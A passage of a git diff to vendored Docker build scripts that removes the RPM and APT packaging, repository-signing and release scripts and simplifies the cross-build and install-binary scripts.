+#!/usr/bin/env bash +# required by `make build-integration-cli-on-swarm` set -e -rm -rf "$DEST" -DEST="$DEST/../test-integration-cli" +source hack/make/.integration-test-helpers -if [ -z $DOCKER_INTEGRATION_TESTS_VERIFIED ]; then - source ${MAKEDIR}/.integration-test-helpers - ensure_test_dir integration-cli "$DEST/test.main" - export DOCKER_INTEGRATION_TESTS_VERIFIED=1 -fi +build_test_suite_binaries diff --git a/vendor/github.com/docker/docker/hack/make/build-rpm b/vendor/github.com/docker/docker/hack/make/build-rpm deleted file mode 100644 index 7fec059392..0000000000 --- a/vendor/github.com/docker/docker/hack/make/build-rpm +++ /dev/null @@ -1,148 +0,0 @@ -#!/bin/bash -set -e - -# subshell so that we can export PATH and TZ without breaking other things -( - export TZ=UTC # make sure our "date" variables are UTC-based - - source "$(dirname "$BASH_SOURCE")/.integration-daemon-start" - source "$(dirname "$BASH_SOURCE")/.detect-daemon-osarch" - - # TODO consider using frozen images for the dockercore/builder-rpm tags - - rpmName=docker-engine - rpmVersion="$VERSION" - rpmRelease=1 - - # rpmRelease versioning is as follows - # Docker 1.7.0: version=1.7.0, release=1 - # Docker 1.7.0-rc1: version=1.7.0, release=0.1.rc1 - # Docker 1.7.0-cs1: version=1.7.0.cs1, release=1 - # Docker 1.7.0-cs1-rc1: version=1.7.0.cs1, release=0.1.rc1 - # Docker 1.7.0-dev nightly: version=1.7.0, release=0.0.YYYYMMDD.HHMMSS.gitHASH - - # if we have a "-rc*" suffix, set appropriate release - if [[ "$rpmVersion" =~ .*-rc[0-9]+$ ]] ; then - rcVersion=${rpmVersion#*-rc} - rpmVersion=${rpmVersion%-rc*} - rpmRelease="0.${rcVersion}.rc${rcVersion}" - fi - - DOCKER_GITCOMMIT=$(git rev-parse --short HEAD) - if [ -n "$(git status --porcelain --untracked-files=no)" ]; then - DOCKER_GITCOMMIT="$DOCKER_GITCOMMIT-unsupported" - fi - - # if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better - if [[ "$rpmVersion" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - gitUnix="$(git log -1 --pretty='%at')" - gitDate="$(date --date "@$gitUnix" +'%Y%m%d.%H%M%S')" - gitCommit="$(git log -1 --pretty='%h')" - gitVersion="${gitDate}.git${gitCommit}" - # gitVersion is now something like '20150128.112847.17e840a' - rpmVersion="${rpmVersion%-dev}" - rpmRelease="0.0.$gitVersion" - fi - - # Replace any other dashes with periods - rpmVersion="${rpmVersion/-/.}" - - rpmPackager="$(awk -F ': ' '$1 == "Packager" { print $2; exit }' hack/make/.build-rpm/${rpmName}.spec)" - rpmDate="$(date +'%a %b %d %Y')" - - # if go-md2man is available, pre-generate the man pages - make manpages - - # Convert the CHANGELOG.md file into RPM changelog format - VERSION_REGEX="^\W\W (.*) \((.*)\)$" - ENTRY_REGEX="^[-+*] (.*)$" - while read -r line || [[ -n "$line" ]]; do - if [ -z "$line" ]; then continue; fi - if [[ "$line" =~ $VERSION_REGEX ]]; then - echo >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog - echo "* `date -d ${BASH_REMATCH[2]} '+%a %b %d %Y'` ${rpmPackager} - ${BASH_REMATCH[1]}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog - fi - if [[ "$line" =~ $ENTRY_REGEX ]]; then - echo "- ${BASH_REMATCH[1]//\`}" >> contrib/builder/rpm/${PACKAGE_ARCH}/changelog - fi - done < CHANGELOG.md - - builderDir="contrib/builder/rpm/${PACKAGE_ARCH}" - pkgs=( $(find "${builderDir}/"*/ -type d) ) - if [ ! -z "$DOCKER_BUILD_PKGS" ]; then - pkgs=() - for p in $DOCKER_BUILD_PKGS; do - pkgs+=( "$builderDir/$p" ) - done - fi - for dir in "${pkgs[@]}"; do - [ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; } - version="$(basename "$dir")" - suite="${version##*-}" - - image="dockercore/builder-rpm:$version" - if ! docker inspect "$image" &> /dev/null; then - ( set -x && docker build ${DOCKER_BUILD_ARGS} -t "$image" "$dir" ) - fi - - mkdir -p "$DEST/$version" - cat > "$DEST/$version/Dockerfile.build" <<-EOF - FROM $image - COPY . /usr/src/${rpmName} - WORKDIR /usr/src/${rpmName} - RUN mkdir -p /go/src/github.com/docker && mkdir -p /go/src/github.com/opencontainers - EOF - - cat >> "$DEST/$version/Dockerfile.build" <<-EOF - # Install runc, containerd, proxy and tini - RUN TMP_GOPATH="/go" ./hack/dockerfile/install-binaries.sh runc-dynamic containerd-dynamic proxy-dynamic tini - EOF - if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - echo 'ENV DOCKER_EXPERIMENTAL 1' >> "$DEST/$version/Dockerfile.build" - fi - cat >> "$DEST/$version/Dockerfile.build" <<-EOF - RUN mkdir -p /root/rpmbuild/SOURCES \ - && echo '%_topdir /root/rpmbuild' > /root/.rpmmacros - WORKDIR /root/rpmbuild - RUN ln -sfv /usr/src/${rpmName}/hack/make/.build-rpm SPECS - WORKDIR /root/rpmbuild/SPECS - RUN tar --exclude .git -r -C /usr/src -f /root/rpmbuild/SOURCES/${rpmName}.tar ${rpmName} - RUN tar --exclude .git -r -C /go/src/github.com/docker -f /root/rpmbuild/SOURCES/${rpmName}.tar containerd - RUN tar --exclude .git -r -C /go/src/github.com/docker/libnetwork/cmd -f /root/rpmbuild/SOURCES/${rpmName}.tar proxy - RUN tar --exclude .git -r -C /go/src/github.com/opencontainers -f /root/rpmbuild/SOURCES/${rpmName}.tar runc - RUN tar --exclude .git -r -C /go/ -f /root/rpmbuild/SOURCES/${rpmName}.tar tini - RUN gzip /root/rpmbuild/SOURCES/${rpmName}.tar - RUN { cat /usr/src/${rpmName}/contrib/builder/rpm/${PACKAGE_ARCH}/changelog; } >> ${rpmName}.spec && tail >&2 ${rpmName}.spec - RUN rpmbuild -ba \ - --define '_gitcommit $DOCKER_GITCOMMIT' \ - --define '_release $rpmRelease' \ - --define '_version $rpmVersion' \ - --define '_origversion $VERSION' \ - --define '_experimental ${DOCKER_EXPERIMENTAL:-0}' \ - ${rpmName}.spec - EOF - # selinux policy referencing systemd things won't work on non-systemd versions - # of centos or rhel, which we don't support anyways - if [ "${suite%.*}" -gt 6 ] && [[ "$version" != opensuse* ]]; then - selinuxDir="selinux" - if [ -d "./contrib/selinux-$version" ]; then - selinuxDir="selinux-${version}" - fi - cat >> "$DEST/$version/Dockerfile.build" <<-EOF - RUN tar -cz -C /usr/src/${rpmName}/contrib/${selinuxDir} -f /root/rpmbuild/SOURCES/${rpmName}-selinux.tar.gz ${rpmName}-selinux - RUN rpmbuild -ba \ - --define '_gitcommit $DOCKER_GITCOMMIT' \ - --define '_release $rpmRelease' \ - --define '_version $rpmVersion' \ - --define '_origversion $VERSION' \ - ${rpmName}-selinux.spec - EOF - fi - tempImage="docker-temp/build-rpm:$version" - ( set -x && docker build -t "$tempImage" -f $DEST/$version/Dockerfile.build . ) - docker run --rm "$tempImage" bash -c 'cd /root/rpmbuild && tar -c *RPMS' | tar -xvC "$DEST/$version" - docker rmi "$tempImage" - done - - source "$(dirname "$BASH_SOURCE")/.integration-daemon-stop" -) 2>&1 | tee -a $DEST/test.log diff --git a/vendor/github.com/docker/docker/hack/make/clean-apt-repo b/vendor/github.com/docker/docker/hack/make/clean-apt-repo deleted file mode 100755 index 1c37d98e40..0000000000 --- a/vendor/github.com/docker/docker/hack/make/clean-apt-repo +++ /dev/null @@ -1,43 +0,0 @@ -#!/bin/bash -set -e - -# This script cleans the experimental pool for the apt repo. -# This is useful when there are a lot of old experimental debs and you only want to keep the most recent. -# - -: ${DOCKER_RELEASE_DIR:=$DEST} -APTDIR=$DOCKER_RELEASE_DIR/apt/repo/pool/experimental -: ${DOCKER_ARCHIVE_DIR:=$DEST/archive} -DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" - -latest_versions=$(dpkg-scanpackages "$APTDIR" /dev/null 2>/dev/null | awk -F ': ' '$1 == "Filename" { print $2 }') - -# get the latest version -latest_docker_engine_file=$(echo "$latest_versions" | grep docker-engine) -latest_docker_engine_version=$(basename ${latest_docker_engine_file%~*}) - -echo "latest docker-engine version: $latest_docker_engine_version" - -# remove all the files that are not that version in experimental -pool_dir=$(dirname "$latest_docker_engine_file") -old_pkgs=( $(ls "$pool_dir" | grep -v "^${latest_docker_engine_version}" | grep "${latest_docker_engine_version%%~git*}") ) - -echo "${old_pkgs[@]}" - -mkdir -p "$DOCKER_ARCHIVE_DIR" -for old_pkg in "${old_pkgs[@]}"; do - echo "moving ${pool_dir}/${old_pkg} to $DOCKER_ARCHIVE_DIR" - mv "${pool_dir}/${old_pkg}" "$DOCKER_ARCHIVE_DIR" -done - -echo -echo "$pool_dir now has contents:" -ls "$pool_dir" - -# now regenerate release files for experimental -export COMPONENT=experimental -source "${DIR}/update-apt-repo" - -echo "You will now want to: " -echo " - re-sign the repo with hack/make/sign-repo" -echo " - re-generate index files with hack/make/generate-index-listing" diff --git a/vendor/github.com/docker/docker/hack/make/clean-yum-repo b/vendor/github.com/docker/docker/hack/make/clean-yum-repo deleted file mode 100755 index 1cafbbd97f..0000000000 --- a/vendor/github.com/docker/docker/hack/make/clean-yum-repo +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -e - -# This script cleans the experimental pool for the yum repo. -# This is useful when there are a lot of old experimental rpms and you only want to keep the most recent. -# - -: ${DOCKER_RELEASE_DIR:=$DEST} -YUMDIR=$DOCKER_RELEASE_DIR/yum/repo/experimental - -suites=( $(find "$YUMDIR" -mindepth 1 -maxdepth 1 -type d) ) - -for suite in "${suites[@]}"; do - echo "cleanup in: $suite" - ( set -x; repomanage -k2 --old "$suite" | xargs rm -f ) -done - -echo "You will now want to: " -echo " - re-sign the repo with hack/make/sign-repo" -echo " - re-generate index files with hack/make/generate-index-listing" diff --git a/vendor/github.com/docker/docker/hack/make/cover b/vendor/github.com/docker/docker/hack/make/cover deleted file mode 100644 index 08e28e3fea..0000000000 --- a/vendor/github.com/docker/docker/hack/make/cover +++ /dev/null @@ -1,15 +0,0 @@ -#!/bin/bash -set -e - -bundle_cover() { - coverprofiles=( "$DEST/../"*"/coverprofiles/"* ) - for p in "${coverprofiles[@]}"; do - echo - ( - set -x - go tool cover -func="$p" - ) - done -} - -bundle_cover 2>&1 | tee "$DEST/report.log" diff --git a/vendor/github.com/docker/docker/hack/make/cross b/vendor/github.com/docker/docker/hack/make/cross index 6d672b17c3..85dd3c637f 100644 --- a/vendor/github.com/docker/docker/hack/make/cross +++ b/vendor/github.com/docker/docker/hack/make/cross @@ -1,46 +1,29 @@ -#!/bin/bash +#!/usr/bin/env bash set -e -# explicit list of os/arch combos that support being a daemon -declare -A daemonSupporting -daemonSupporting=( - [linux/amd64]=1 - [windows/amd64]=1 -) - # if we have our linux/amd64 version compiled, let's symlink it in if [ -x "$DEST/../binary-daemon/dockerd-$VERSION" ]; then arch=$(go env GOHOSTARCH) mkdir -p "$DEST/linux/${arch}" ( cd "$DEST/linux/${arch}" - ln -s ../../../binary-daemon/* ./ - ln -s ../../../binary-client/* ./ + ln -sf ../../../binary-daemon/* ./ ) echo "Created symlinks:" "$DEST/linux/${arch}/"* fi +DOCKER_CROSSPLATFORMS=${DOCKER_CROSSPLATFORMS:-"linux/amd64 windows/amd64"} + for platform in $DOCKER_CROSSPLATFORMS; do ( export KEEPDEST=1 export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION - mkdir -p "$DEST" - ABS_DEST="$(cd "$DEST" && pwd -P)" export GOOS=${platform%/*} export GOARCH=${platform##*/} - if [ "$GOOS" != "solaris" ]; then - # TODO. Solaris cannot be cross build because of CGO calls. - if [ -z "${daemonSupporting[$platform]}" ]; then - # we just need a simple client for these platforms - export LDFLAGS_STATIC_DOCKER="" - # remove the "daemon" build tag from platforms that aren't supported - export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" ) - source "${MAKEDIR}/binary-client" - else - source "${MAKEDIR}/binary-client" - source "${MAKEDIR}/binary-daemon" - fi - fi + echo "Cross building: $DEST" + mkdir -p "$DEST" + ABS_DEST="$(cd "$DEST" && pwd -P)" + source "${MAKEDIR}/binary-daemon" ) done diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary b/vendor/github.com/docker/docker/hack/make/dynbinary index 1a435dc4bf..981e505e9f 100644 --- a/vendor/github.com/docker/docker/hack/make/dynbinary +++ b/vendor/github.com/docker/docker/hack/make/dynbinary @@ -1,12 +1,7 @@ -#!/bin/bash +#!/usr/bin/env bash set -e # This script exists as backwards compatibility for CI -( - DEST="${DEST}-client" - ABS_DEST="${ABS_DEST}-client" - . hack/make/dynbinary-client -) ( DEST="${DEST}-daemon" diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-client b/vendor/github.com/docker/docker/hack/make/dynbinary-client deleted file mode 100644 index e4b7741848..0000000000 --- a/vendor/github.com/docker/docker/hack/make/dynbinary-client +++ /dev/null @@ -1,12 +0,0 @@ -#!/bin/bash -set -e - -( - export BINARY_SHORT_NAME='docker' - export GO_PACKAGE='github.com/docker/docker/cmd/docker' - export IAMSTATIC='false' - export LDFLAGS_STATIC_DOCKER='' - export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary - export BUILDFLAGS=( "${BUILDFLAGS[@]/static_build /}" ) # we're not building a "static" binary here - source "${MAKEDIR}/.binary" -) diff --git a/vendor/github.com/docker/docker/hack/make/dynbinary-daemon b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon index 090a916f65..d1c0070e62 100644 --- a/vendor/github.com/docker/docker/hack/make/dynbinary-daemon +++ b/vendor/github.com/docker/docker/hack/make/dynbinary-daemon @@ -1,9 +1,7 @@ -#!/bin/bash +#!/usr/bin/env bash set -e ( - export BINARY_SHORT_NAME='dockerd' - export GO_PACKAGE='github.com/docker/docker/cmd/dockerd' export IAMSTATIC='false' export LDFLAGS_STATIC_DOCKER='' export BUILDFLAGS=( "${BUILDFLAGS[@]/netgo /}" ) # disable netgo, since we don't need it for a dynamic binary diff --git a/vendor/github.com/docker/docker/hack/make/generate-index-listing b/vendor/github.com/docker/docker/hack/make/generate-index-listing deleted file mode 100755 index ec44171f81..0000000000 --- a/vendor/github.com/docker/docker/hack/make/generate-index-listing +++ /dev/null @@ -1,74 +0,0 @@ -#!/bin/bash -set -e - -# This script generates index files for the directory structure -# of the apt and yum repos - -: ${DOCKER_RELEASE_DIR:=$DEST} -APTDIR=$DOCKER_RELEASE_DIR/apt -YUMDIR=$DOCKER_RELEASE_DIR/yum - -if [ ! -d $APTDIR ] && [ ! -d $YUMDIR ]; then - echo >&2 'release-rpm or release-deb must be run before generate-index-listing' - exit 1 -fi - -create_index() { - local directory=$1 - local original=$2 - local cleaned=${directory#$original} - - # the index file to create - local index_file="${directory}/index" - - # cd into dir & touch the index file - cd $directory - touch $index_file - - # print the html header - cat <<-EOF > "$index_file" - - - Index of ${cleaned}/ - -

Index of ${cleaned}/


-

" >> $index_file - -} - -get_dirs() { - local directory=$1 - - for d in `find ${directory} -type d`; do - create_index $d $directory - done -} - -get_dirs $APTDIR -get_dirs $YUMDIR diff --git a/vendor/github.com/docker/docker/hack/make/install-binary b/vendor/github.com/docker/docker/hack/make/install-binary index 82cbc79933..f6a4361fdb 100644 --- a/vendor/github.com/docker/docker/hack/make/install-binary +++ b/vendor/github.com/docker/docker/hack/make/install-binary @@ -1,12 +1,29 @@ -#!/bin/bash +#!/usr/bin/env bash set -e rm -rf "$DEST" -( - source "${MAKEDIR}/install-binary-client" -) +install_binary() { + local file="$1" + local target="${DOCKER_MAKE_INSTALL_PREFIX:=/usr/local}/bin/" + if [ "$(go env GOOS)" == "linux" ]; then + echo "Installing $(basename $file) to ${target}" + mkdir -p "$target" + cp -f -L "$file" "$target" + else + echo "Install is only supported on linux" + return 1 + fi +} ( - source "${MAKEDIR}/install-binary-daemon" + DEST="$(dirname $DEST)/binary-daemon" + source "${MAKEDIR}/.binary-setup" + install_binary "${DEST}/${DOCKER_DAEMON_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_RUNC_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_CTR_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_CONTAINERD_SHIM_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_PROXY_BINARY_NAME}" + install_binary "${DEST}/${DOCKER_INIT_BINARY_NAME}" ) diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-client b/vendor/github.com/docker/docker/hack/make/install-binary-client deleted file mode 100644 index 6c80452659..0000000000 --- a/vendor/github.com/docker/docker/hack/make/install-binary-client +++ /dev/null @@ -1,10 +0,0 @@ -#!/bin/bash - -set -e -rm -rf "$DEST" - -( - DEST="$(dirname $DEST)/binary-client" - source "${MAKEDIR}/.binary-setup" - install_binary "${DEST}/${DOCKER_CLIENT_BINARY_NAME}" -) diff --git a/vendor/github.com/docker/docker/hack/make/install-binary-daemon b/vendor/github.com/docker/docker/hack/make/install-binary-daemon deleted file mode 100644 index 08a2d69b96..0000000000 --- a/vendor/github.com/docker/docker/hack/make/install-binary-daemon +++ /dev/null @@ -1,16 +0,0 @@ -#!/bin/bash - -set -e -rm -rf "$DEST" - -( - DEST="$(dirname $DEST)/binary-daemon" - source "${MAKEDIR}/.binary-setup" - install_binary "${DEST}/${DOCKER_DAEMON_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_RUNC_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_CONTAINERD_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_CONTAINERD_CTR_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_CONTAINERD_SHIM_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_PROXY_BINARY_NAME}" - install_binary "${DEST}/${DOCKER_INIT_BINARY_NAME}" -) diff --git a/vendor/github.com/docker/docker/hack/make/install-script b/vendor/github.com/docker/docker/hack/make/install-script deleted file mode 100644 index feadac2f38..0000000000 --- a/vendor/github.com/docker/docker/hack/make/install-script +++ /dev/null @@ -1,63 +0,0 @@ -#!/bin/bash -set -e - -# This script modifies the install.sh script for domains and keys other than -# those used by the primary opensource releases. -# -# You can provide `url`, `yum_url`, `apt_url` and optionally `gpg_fingerprint` -# or `GPG_KEYID` as environment variables, or the defaults for open source are used. -# -# The lower-case variables are substituted into install.sh. -# -# gpg_fingerprint and GPG_KEYID are optional, defaulting to the opensource release -# key ("releasedocker"). Other GPG_KEYIDs will require you to mount a volume with -# the correct contents to /root/.gnupg. -# -# It outputs the modified `install.sh` file to $DOCKER_RELEASE_DIR (default: $DEST) -# -# Example usage: -# -# docker run \ -# --rm \ -# --privileged \ -# -e "GPG_KEYID=deadbeef" \ -# -e "GNUPGHOME=/root/.gnupg" \ -# -v $HOME/.gnupg:/root/.gnupg \ -# -v $(pwd):/go/src/github.com/docker/docker/bundles \ -# "$IMAGE_DOCKER" \ -# hack/make.sh install-script - -: ${DOCKER_RELEASE_DIR:=$DEST} -: ${GPG_KEYID:=releasedocker} - -DEFAULT_URL="https://get.docker.com/" -DEFAULT_APT_URL="https://apt.dockerproject.org" -DEFAULT_YUM_URL="https://yum.dockerproject.org" -DEFAULT_GPG_FINGERPRINT="58118E89F3A912897C070ADBF76221572C52609D" - -: ${url:=$DEFAULT_URL} -: ${apt_url:=$DEFAULT_APT_URL} -: ${yum_url:=$DEFAULT_YUM_URL} -if [[ "$GPG_KEYID" == "releasedocker" ]] ; then - : ${gpg_fingerprint:=$DEFAULT_GPG_FINGERPRINT} -fi - -DEST_FILE="$DOCKER_RELEASE_DIR/install.sh" - -bundle_install_script() { - mkdir -p "$DOCKER_RELEASE_DIR" - - if [[ -z "$gpg_fingerprint" ]] ; then - # NOTE: if no key matching key is in /root/.gnupg, this will fail - gpg_fingerprint=$(gpg --with-fingerprint -k "$GPG_KEYID" | grep "Key fingerprint" | awk -F "=" '{print $2};' | tr -d ' ') - fi - - cp hack/install.sh "$DEST_FILE" - sed -i.bak 's#^url=".*"$#url="'"$url"'"#' "$DEST_FILE" - sed -i.bak 's#^apt_url=".*"$#apt_url="'"$apt_url"'"#' "$DEST_FILE" - sed -i.bak 's#^yum_url=".*"$#yum_url="'"$yum_url"'"#' "$DEST_FILE" - sed -i.bak 's#^gpg_fingerprint=".*"$#gpg_fingerprint="'"$gpg_fingerprint"'"#' "$DEST_FILE" - rm "${DEST_FILE}.bak" -} - -bundle_install_script diff --git a/vendor/github.com/docker/docker/hack/make/release-deb b/vendor/github.com/docker/docker/hack/make/release-deb deleted file mode 100755 index ed65fe2f5f..0000000000 --- a/vendor/github.com/docker/docker/hack/make/release-deb +++ /dev/null @@ -1,163 +0,0 @@ -#!/bin/bash -set -e - -# This script creates the apt repos for the .deb files generated by hack/make/build-deb -# -# The following can then be used as apt sources: -# deb http://apt.dockerproject.org/repo $distro-$release $version -# -# For example: -# deb http://apt.dockerproject.org/repo ubuntu-trusty main -# deb http://apt.dockerproject.org/repo ubuntu-trusty testing -# deb http://apt.dockerproject.org/repo debian-wheezy experimental -# deb http://apt.dockerproject.org/repo debian-jessie main -# -# ... and so on and so forth for the builds created by hack/make/build-deb - -: ${DOCKER_RELEASE_DIR:=$DEST} -: ${GPG_KEYID:=releasedocker} -APTDIR=$DOCKER_RELEASE_DIR/apt/repo - -# setup the apt repo (if it does not exist) -mkdir -p "$APTDIR/conf" "$APTDIR/db" "$APTDIR/dists" - -# supported arches/sections -arches=( amd64 i386 armhf ) - -# Preserve existing components but don't add any non-existing ones -for component in main testing experimental ; do - exists=$(find "$APTDIR/dists" -mindepth 2 -maxdepth 2 -type d -name "$component" -print -quit) - if [ -n "$exists" ] ; then - components+=( $component ) - fi -done - -# set the component for the version being released -component="main" - -if [[ "$VERSION" == *-rc* ]]; then - component="testing" -fi - -if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - component="experimental" -fi - -# Make sure our component is in the list of components -if [[ ! "${components[*]}" =~ $component ]] ; then - components+=( $component ) -fi - -# create apt-ftparchive file on every run. This is essential to avoid -# using stale versions of the config file that could cause unnecessary -# refreshing of bits for EOL-ed releases. -cat <<-EOF > "$APTDIR/conf/apt-ftparchive.conf" -Dir { - ArchiveDir "${APTDIR}"; - CacheDir "${APTDIR}/db"; -}; - -Default { - Packages::Compress ". gzip bzip2"; - Sources::Compress ". gzip bzip2"; - Contents::Compress ". gzip bzip2"; -}; - -TreeDefault { - BinCacheDB "packages-\$(SECTION)-\$(ARCH).db"; - Directory "pool/\$(SECTION)"; - Packages "\$(DIST)/\$(SECTION)/binary-\$(ARCH)/Packages"; - SrcDirectory "pool/\$(SECTION)"; - Sources "\$(DIST)/\$(SECTION)/source/Sources"; - Contents "\$(DIST)/\$(SECTION)/Contents-\$(ARCH)"; - FileList "$APTDIR/\$(DIST)/\$(SECTION)/filelist"; -}; -EOF - -for dir in bundles/$VERSION/build-deb/*/; do - version="$(basename "$dir")" - suite="${version//debootstrap-}" - - cat <<-EOF - Tree "dists/${suite}" { - Sections "${components[*]}"; - Architectures "${arches[*]}"; - } - - EOF -done >> "$APTDIR/conf/apt-ftparchive.conf" - -cat <<-EOF > "$APTDIR/conf/docker-engine-release.conf" -APT::FTPArchive::Release::Origin "Docker"; -APT::FTPArchive::Release::Components "${components[*]}"; -APT::FTPArchive::Release::Label "Docker APT Repository"; -APT::FTPArchive::Release::Architectures "${arches[*]}"; -EOF - -# release the debs -for dir in bundles/$VERSION/build-deb/*/; do - version="$(basename "$dir")" - codename="${version//debootstrap-}" - - tempdir="$(mktemp -d /tmp/tmp-docker-release-deb.XXXXXXXX)" - DEBFILE=( "$dir/docker-engine"*.deb ) - - # add the deb for each component for the distro version into the - # pool (if it is not there already) - mkdir -p "$APTDIR/pool/$component/d/docker-engine/" - for deb in ${DEBFILE[@]}; do - d=$(basename "$deb") - # We do not want to generate a new deb if it has already been - # copied into the APTDIR - if [ ! -f "$APTDIR/pool/$component/d/docker-engine/$d" ]; then - cp "$deb" "$tempdir/" - # if we have a $GPG_PASSPHRASE we may as well - # dpkg-sign before copying the deb into the pool - if [ ! -z "$GPG_PASSPHRASE" ]; then - dpkg-sig -g "--no-tty --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE'" \ - -k "$GPG_KEYID" --sign builder "$tempdir/$d" - fi - mv "$tempdir/$d" "$APTDIR/pool/$component/d/docker-engine/" - fi - done - - rm -rf "$tempdir" - - # build the right directory structure, needed for apt-ftparchive - for arch in "${arches[@]}"; do - for c in "${components[@]}"; do - mkdir -p "$APTDIR/dists/$codename/$c/binary-$arch" - done - done - - # update the filelist for this codename/component - find "$APTDIR/pool/$component" \ - -name *~${codename}*.deb -o \ - -name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist" -done - -# run the apt-ftparchive commands so we can have pinning -apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf" - -for dir in bundles/$VERSION/build-deb/*/; do - version="$(basename "$dir")" - codename="${version//debootstrap-}" - - apt-ftparchive \ - -c "$APTDIR/conf/docker-engine-release.conf" \ - -o "APT::FTPArchive::Release::Codename=$codename" \ - -o "APT::FTPArchive::Release::Suite=$codename" \ - release \ - "$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release" - - for arch in "${arches[@]}"; do - apt-ftparchive \ - -c "$APTDIR/conf/docker-engine-release.conf" \ - -o "APT::FTPArchive::Release::Codename=$codename" \ - -o "APT::FTPArchive::Release::Suite=$codename" \ - -o "APT::FTPArchive::Release::Components=$component" \ - -o "APT::FTPArchive::Release::Architecture=$arch" \ - release \ - "$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release" - done -done diff --git a/vendor/github.com/docker/docker/hack/make/release-rpm b/vendor/github.com/docker/docker/hack/make/release-rpm deleted file mode 100755 index d7e3ec4f8a..0000000000 --- a/vendor/github.com/docker/docker/hack/make/release-rpm +++ /dev/null @@ -1,71 +0,0 @@ -#!/bin/bash -set -e - -# This script creates the yum repos for the .rpm files generated by hack/make/build-rpm -# -# The following can then be used as a yum repo: -# http://yum.dockerproject.org/repo/$release/$distro/$distro-version -# -# For example: -# http://yum.dockerproject.org/repo/main/fedora/23 -# http://yum.dockerproject.org/repo/testing/centos/7 -# http://yum.dockerproject.org/repo/experimental/fedora/23 -# http://yum.dockerproject.org/repo/main/centos/7 -# -# ... and so on and so forth for the builds created by hack/make/build-rpm - -: ${DOCKER_RELEASE_DIR:=$DEST} -YUMDIR=$DOCKER_RELEASE_DIR/yum/repo -: ${GPG_KEYID:=releasedocker} - -# get the release -release="main" - -if [[ "$VERSION" == *-rc* ]]; then - release="testing" -fi - -if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then - release="experimental" -fi - -# Setup the yum repo -for dir in bundles/$VERSION/build-rpm/*/; do - version="$(basename "$dir")" - suite="${version##*-}" - distro="${version%-*}" - - REPO=$YUMDIR/$release/$distro - - # if the directory does not exist, initialize the yum repo - if [[ ! -d $REPO/$suite/Packages ]]; then - mkdir -p "$REPO/$suite/Packages" - - createrepo --pretty "$REPO/$suite" - fi - - # path to rpms - RPMFILE=( "bundles/$VERSION/build-rpm/$version/RPMS/"*"/docker-engine"*.rpm "bundles/$VERSION/build-rpm/$version/SRPMS/docker-engine"*.rpm ) - - # if we have a $GPG_PASSPHRASE we may as well - # sign the rpms before adding to repo - if [ ! -z $GPG_PASSPHRASE ]; then - # export our key to rpm import - gpg --armor --export "$GPG_KEYID" > /tmp/gpg - rpm --import /tmp/gpg - - # sign the rpms - echo "yes" | setsid rpm \ - --define "_gpg_name $GPG_KEYID" \ - --define "_signature gpg" \ - --define "__gpg_check_password_cmd /bin/true" \ - --define "__gpg_sign_cmd %{__gpg} gpg --batch --no-armor --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE' --no-secmem-warning -u '%{_gpg_name}' --sign --detach-sign --output %{__signature_filename} %{__plaintext_filename}" \ - --resign "${RPMFILE[@]}" - fi - - # copy the rpms to the packages folder - cp "${RPMFILE[@]}" "$REPO/$suite/Packages" - - # update the repo - createrepo --pretty --update "$REPO/$suite" -done diff --git a/vendor/github.com/docker/docker/hack/make/run b/vendor/github.com/docker/docker/hack/make/run index 37cfd53b5f..3254280260 100644 --- a/vendor/github.com/docker/docker/hack/make/run +++ b/vendor/github.com/docker/docker/hack/make/run @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e rm -rf "$DEST" @@ -28,9 +28,9 @@ if [ -n "$DOCKER_PORT" ]; then listen_port="${ports[-1]}" fi -extra_params="" +extra_params="$DOCKERD_ARGS" if [ "$DOCKER_REMAP_ROOT" ]; then - extra_params="--userns-remap $DOCKER_REMAP_ROOT" + extra_params="$extra_params --userns-remap $DOCKER_REMAP_ROOT" fi args="--debug \ diff --git a/vendor/github.com/docker/docker/hack/make/sign-repos b/vendor/github.com/docker/docker/hack/make/sign-repos deleted file mode 100755 index 6ed1606885..0000000000 --- a/vendor/github.com/docker/docker/hack/make/sign-repos +++ /dev/null @@ -1,65 +0,0 @@ -#!/bin/bash - -# This script signs the deliverables from release-deb and release-rpm -# with a designated GPG key. - -: ${DOCKER_RELEASE_DIR:=$DEST} -: ${GPG_KEYID:=releasedocker} -APTDIR=$DOCKER_RELEASE_DIR/apt/repo -YUMDIR=$DOCKER_RELEASE_DIR/yum/repo - -if [ -z "$GPG_PASSPHRASE" ]; then - echo >&2 'you need to set GPG_PASSPHRASE in order to sign artifacts' - exit 1 -fi - -if [ ! -d $APTDIR ] && [ ! -d 